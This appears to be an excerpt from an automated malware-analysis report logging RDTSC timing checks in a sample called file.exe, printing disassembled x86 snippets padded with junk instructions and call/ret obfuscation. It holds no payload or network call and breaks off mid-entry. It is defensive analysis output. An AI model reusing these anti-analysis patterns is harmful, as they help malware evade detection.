Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F578B2 second address: F578F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5344B32607h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xor dword ptr [esp], 0CE9B39Fh 0x00000014 sub edx, dword ptr [ebp+122D2ADFh] 0x0000001a mov ch, ah 0x0000001c lea ebx, dword ptr [ebp+1244930Eh] 0x00000022 mov ch, ah 0x00000024 xchg eax, ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jc 00007F5344B325F6h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F578F3 second address: F578F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F578F7 second address: F578FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6A95B second address: F6A965 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5344E6BF46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7938B second address: F7938F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7938F second address: F79395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F79395 second address: F793A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F793A1 second address: F793A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F771EC second address: F771F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F771F2 second address: F771FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F771FC second address: F77206 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F77206 second address: F7720A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7734C second address: F77387 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5344B325F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jne 00007F5344B325F6h 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F5344B32603h 0x0000001a popad 0x0000001b jmp 00007F5344B325FAh 0x00000020 jl 00007F5344B325FCh 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F77387 second address: F77396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 jbe 00007F5344E6BF46h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F77396 second address: F773A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5344B325FCh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F773A8 second address: F773C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jne 00007F5344E6BF46h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5344E6BF4Bh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F773C6 second address: F773CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F77671 second address: F77675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7779F second address: F777AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 jg 00007F5344B325F6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F777AF second address: F777B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F778F0 second address: F77928 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 jnp 00007F5344B32611h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F5344B325FAh 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F77DD2 second address: F77DDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F77DDA second address: F77DF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push edi 0x00000007 ja 00007F5344B325FCh 0x0000000d jc 00007F5344B325F6h 0x00000013 push eax 0x00000014 push edx 0x00000015 jbe 00007F5344B325F6h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F77DF5 second address: F77DF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F77F2B second address: F77F3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F5344B325F6h 0x0000000a je 00007F5344B325F6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F77F3D second address: F77F42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F77F42 second address: F77F4D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jno 00007F5344B325F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F77F4D second address: F77F57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F78214 second address: F7821A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4B2D0 second address: F4B2FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jno 00007F5344E6BF46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e push edi 0x0000000f jmp 00007F5344E6BF58h 0x00000014 pop edi 0x00000015 push ebx 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F78BEF second address: F78C10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F5344B325FDh 0x0000000d pop esi 0x0000000e push eax 0x0000000f push esi 0x00000010 pushad 0x00000011 popad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F78C10 second address: F78C1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F5344E6BF46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F78EF1 second address: F78F4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5344B32604h 0x00000007 jmp 00007F5344B325FAh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f jmp 00007F5344B325FBh 0x00000014 pop edx 0x00000015 jmp 00007F5344B32602h 0x0000001a popad 0x0000001b push edx 0x0000001c pushad 0x0000001d jnp 00007F5344B325F6h 0x00000023 pushad 0x00000024 popad 0x00000025 jmp 00007F5344B325FBh 0x0000002a popad 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F78F4D second address: F78F51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7FD13 second address: F7FD18 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7FD18 second address: F7FD2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d js 00007F5344E6BF4Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F80498 second address: F804AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F5344B325F8h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F83EF5 second address: F83EFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F83EFC second address: F83F01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F83F01 second address: F83F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F83325 second address: F8332B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8332B second address: F8334B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F5344E6BF48h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F5344E6BF4Fh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8334B second address: F83361 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5344B325FCh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8348F second address: F83493 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F83493 second address: F8349D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8349D second address: F834A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8361E second address: F83624 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F83624 second address: F83651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jnl 00007F5344E6BF52h 0x0000000d popad 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 jmp 00007F5344E6BF4Eh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F83651 second address: F83677 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5344B325FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5344B32605h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F83A6E second address: F83A73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F83D7D second address: F83D83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F858C7 second address: F858CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F85A51 second address: F85A61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5344B325FBh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F85FF1 second address: F85FFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8606D second address: F86071 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8612E second address: F86148 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F5344E6BF4Eh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F86148 second address: F8614F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8620D second address: F8622A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F5344E6BF55h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8634F second address: F86353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F86353 second address: F86357 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F871D4 second address: F871D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F87B03 second address: F87B27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F5344E6BF58h 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F871D8 second address: F871E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8847E second address: F88482 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F87B27 second address: F87B2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F88E58 second address: F88EA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F5344F55AA8h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 xor edi, 58788157h 0x0000002d push 00000000h 0x0000002f add dword ptr [ebp+122D1DAEh], eax 0x00000035 push 00000000h 0x00000037 mov si, 0B1Eh 0x0000003b push eax 0x0000003c pushad 0x0000003d push edi 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F897EF second address: F89849 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5344E5026Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b jmp 00007F5344E5026Dh 0x00000010 pop edi 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007F5344E50268h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 0000001Bh 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c movsx edi, ax 0x0000002f push 00000000h 0x00000031 mov edi, 3BE1E690h 0x00000036 push 00000000h 0x00000038 mov edi, eax 0x0000003a push eax 0x0000003b je 00007F5344E5026Eh 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F89FA5 second address: F89FAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8ACF4 second address: F8AD4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5344E5026Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b sub dword ptr [ebp+1245B879h], ecx 0x00000011 push 00000000h 0x00000013 js 00007F5344E50266h 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push esi 0x0000001e call 00007F5344E50268h 0x00000023 pop esi 0x00000024 mov dword ptr [esp+04h], esi 0x00000028 add dword ptr [esp+04h], 0000001Bh 0x00000030 inc esi 0x00000031 push esi 0x00000032 ret 0x00000033 pop esi 0x00000034 ret 0x00000035 jnl 00007F5344E5026Ch 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 push ebx 0x00000041 pop ebx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8AD4A second address: F8AD4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8AD4E second address: F8AD54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8AD54 second address: F8AD59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8B78A second address: F8B78F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8D100 second address: F8D114 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F5344F55AAEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F44871 second address: F44875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F91F40 second address: F91F4A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5344F55AACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F91F4A second address: F91F69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a jmp 00007F5344E50274h 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F91F69 second address: F91F6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F93C17 second address: F93C67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 xor dword ptr [ebp+122D2E79h], esi 0x0000000f push 00000000h 0x00000011 mov edi, dword ptr [ebp+122D18F1h] 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007F5344E50268h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 0000001Bh 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 adc bx, EE3Ah 0x00000038 xchg eax, esi 0x00000039 push eax 0x0000003a push edx 0x0000003b jne 00007F5344E5026Ch 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F91F6F second address: F91F73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F93C67 second address: F93C7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5344E50273h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F92F0F second address: F92F13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F91F73 second address: F91FFB instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5344E50266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push dword ptr fs:[00000000h] 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007F5344E50268h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e mov ebx, 0F8E55C6h 0x00000033 sub dword ptr [ebp+1245B884h], ebx 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 add edi, dword ptr [ebp+122D2F11h] 0x00000046 mov eax, dword ptr [ebp+122D0675h] 0x0000004c sbb edi, 2D0CAA6Dh 0x00000052 push FFFFFFFFh 0x00000054 push 00000000h 0x00000056 push edx 0x00000057 call 00007F5344E50268h 0x0000005c pop edx 0x0000005d mov dword ptr [esp+04h], edx 0x00000061 add dword ptr [esp+04h], 0000001Ch 0x00000069 inc edx 0x0000006a push edx 0x0000006b ret 0x0000006c pop edx 0x0000006d ret 0x0000006e mov di, dx 0x00000071 nop 0x00000072 pushad 0x00000073 push eax 0x00000074 push edx 0x00000075 push eax 0x00000076 push edx 0x00000077 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F91FFB second address: F91FFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F94CAF second address: F94CB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F94CB5 second address: F94D58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5344F55AB0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a je 00007F5344F55AAEh 0x00000010 push ebx 0x00000011 jng 00007F5344F55AA6h 0x00000017 pop ebx 0x00000018 nop 0x00000019 or di, C998h 0x0000001e movzx edi, cx 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push ecx 0x00000026 call 00007F5344F55AA8h 0x0000002b pop ecx 0x0000002c mov dword ptr [esp+04h], ecx 0x00000030 add dword ptr [esp+04h], 0000001Ch 0x00000038 inc ecx 0x00000039 push ecx 0x0000003a ret 0x0000003b pop ecx 0x0000003c ret 0x0000003d call 00007F5344F55AB6h 0x00000042 pop ebx 0x00000043 movsx edi, dx 0x00000046 push 00000000h 0x00000048 push 00000000h 0x0000004a push esi 0x0000004b call 00007F5344F55AA8h 0x00000050 pop esi 0x00000051 mov dword ptr [esp+04h], esi 0x00000055 add dword ptr [esp+04h], 00000017h 0x0000005d inc esi 0x0000005e push esi 0x0000005f ret 0x00000060 pop esi 0x00000061 ret 0x00000062 xchg eax, esi 0x00000063 jmp 00007F5344F55AAEh 0x00000068 push eax 0x00000069 push eax 0x0000006a push edx 0x0000006b push eax 0x0000006c push esi 0x0000006d pop esi 